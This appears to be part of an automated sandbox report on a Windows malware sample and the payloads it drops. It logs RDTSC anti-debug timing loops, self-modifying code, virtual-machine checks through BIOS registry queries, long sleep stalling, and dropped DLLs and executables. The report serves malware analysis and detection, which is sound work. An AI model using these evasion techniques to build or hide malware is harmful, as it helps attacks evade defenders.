                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A098B second address: 50A0A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 00000000h 0x0000000f jmp 00007F0E647B607Eh 0x00000014 test esi, esi 0x00000016 jmp 00007F0E647B6080h 0x0000001b je 00007F0ED663BA4Ah 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 push ebx 0x00000025 pushfd 0x00000026 jmp 00007F0E647B6084h 0x0000002b jmp 00007F0E647B6085h 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov dl, ah 0x0000003f mov esi, ebx 0x00000041 popad 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0A00 second address: 50A0A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 add si, A7C8h 0x0000000e jmp 00007F0E6551CA3Bh 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, esi 0x0000001c jmp 00007F0E6551CA3Bh 0x00000021 je 00007F0ED73A23A5h 0x00000027 pushad 0x00000028 push esi 0x00000029 mov bh, F0h 0x0000002b pop esi 0x0000002c mov esi, ebx 0x0000002e popad 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 jmp 00007F0E6551CA45h 0x0000003c push eax 0x0000003d push edx 0x0000003e mov edi, eax 0x00000040 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0A63 second address: 50A0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B607Ah 0x00000008 adc ax, F7B8h 0x0000000d jmp 00007F0E647B607Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 jne 00007F0ED663B9A8h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0E647B6085h 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0AA1 second address: 50A0AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0AB5 second address: 50A0AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0AB9 second address: 50A0ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0ABF second address: 50A0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop edi 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0ADC second address: 50A0B10 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 0FA105FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, ecx 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F0E6551CA3Fh 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E6551CA45h 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0B10 second address: 50A0B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E647B6087h 0x00000009 sub eax, 303046FEh 0x0000000f jmp 00007F0E647B6089h 0x00000014 popfd 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0B57 second address: 50A0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0B5B second address: 50A0B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0B61 second address: 50A0BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 sub eax, 66027D28h 0x0000000f jmp 00007F0E6551CA3Bh 0x00000014 popfd 0x00000015 call 00007F0E6551CA48h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007F0E6551CA40h 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a mov si, bx 0x0000002d popad 0x0000002e popad 0x0000002f push dword ptr [ebp+14h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0BC3 second address: 50A0BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0BC7 second address: 50A0BDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E6551CA3Ch 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C07 second address: 50A0C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C0D second address: 50A0C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C13 second address: 50A0C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B607Bh 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C29 second address: 50A0C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C2F second address: 50A0C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C33 second address: 50A0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov di, ax 0x00000014 popad 0x00000015 popad 0x00000016 mov esp, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E6551CA48h 0x0000001f xor esi, 4DC90E98h 0x00000025 jmp 00007F0E6551CA3Bh 0x0000002a popfd 0x0000002b pushad 0x0000002c push ecx 0x0000002d pop edx 0x0000002e movzx ecx, bx 0x00000031 popad 0x00000032 popad 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C86 second address: 50A0C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0C8A second address: 50A0C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0A77 second address: 50B0B1A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B6080h 0x00000008 sub ecx, 22AABF38h 0x0000000e jmp 00007F0E647B607Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F0E647B6088h 0x0000001c and eax, 77363998h 0x00000022 jmp 00007F0E647B607Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F0E647B607Bh 0x00000034 jmp 00007F0E647B6083h 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F0E647B6088h 0x00000040 and ax, 3E58h 0x00000045 jmp 00007F0E647B607Bh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0B1A second address: 50B0B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0B20 second address: 50B0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0B24 second address: 50B0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E6B second address: 5120E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E6F second address: 5120E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E75 second address: 5120ED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, cl 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F0E647B6085h 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007F0E647B607Ch 0x0000001e mov ch, 7Dh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E647B607Fh 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120ED1 second address: 5120ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120ED5 second address: 5120EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203AE second address: 51203B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203B2 second address: 51203B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203B8 second address: 51203D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov bx, si 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203D4 second address: 51203EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6082h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203EA second address: 51203EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120642 second address: 5120648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120648 second address: 512064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512064E second address: 5120652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120652 second address: 5120699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e pushfd 0x0000000f jmp 00007F0E6551CA3Ch 0x00000014 and ch, FFFFFFF8h 0x00000017 jmp 00007F0E6551CA3Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx edx, si 0x00000023 mov di, cx 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F0E6551CA3Ah 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120699 second address: 512069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512069D second address: 51206BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206BA second address: 51206CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206CA second address: 51206CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70FFD second address: A71003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8BEE34 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A65351 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A63DCC instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A639E1 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AF1440 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: A0EE34 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BB5351 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BB3DCC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BB39E1 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C41440 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSpecial instruction interceptor: First address: FC7CAA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSpecial instruction interceptor: First address: FC7DAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSpecial instruction interceptor: First address: 115D7FD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSpecial instruction interceptor: First address: 11F2DF2 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSpecial instruction interceptor: First address: CA5A37 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSpecial instruction interceptor: First address: E4979B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSpecial instruction interceptor: First address: CA367E instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeSpecial instruction interceptor: First address: CA59DA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: FCFB8D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: FCFC8F instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: FCD566 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: 115FE1D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: 1168FA0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeSpecial instruction interceptor: First address: 11F49A7 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSpecial instruction interceptor: First address: 81C9EE instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSpecial instruction interceptor: First address: 9BEF79 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeSpecial instruction interceptor: First address: 81A576 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSpecial instruction interceptor: First address: F1798D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSpecial instruction interceptor: First address: 10DEC68 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSpecial instruction interceptor: First address: 10C0DA8 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSpecial instruction interceptor: First address: 11455D7 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeSpecial instruction interceptor: First address: 5AFC4C instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeSpecial instruction interceptor: First address: 5AD642 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeSpecial instruction interceptor: First address: 788AE3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeSpecial instruction interceptor: First address: 7EFFD9 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05120D04 rdtsc 0_2_05120D04
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1349Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1251Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1253Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1238Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeWindow / User API: threadDelayed 9736
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow / User API: threadDelayed 1223
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow / User API: threadDelayed 1231
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow / User API: threadDelayed 1167
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow / User API: threadDelayed 1426
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow / User API: threadDelayed 1197
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow / User API: threadDelayed 1194
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow / User API: threadDelayed 1206
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow / User API: threadDelayed 1204
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow / User API: threadDelayed 1224
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow / User API: threadDelayed 1181
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\W5BO33UUYQPDZ9CE875CW1XCH.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Bunifu_UI_v1.5.3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RHNKLLDCS2RT92VKR9MYB3VQ90O2X.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 744Thread sleep count: 58 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 744Thread sleep time: -116058s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4592Thread sleep count: 1349 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4592Thread sleep time: -2699349s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3624Thread sleep count: 1251 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3624Thread sleep time: -2503251s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6108Thread sleep count: 1253 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6108Thread sleep time: -2507253s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144Thread sleep count: 1238 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144Thread sleep time: -2477238s >= -30000sJump to behavior
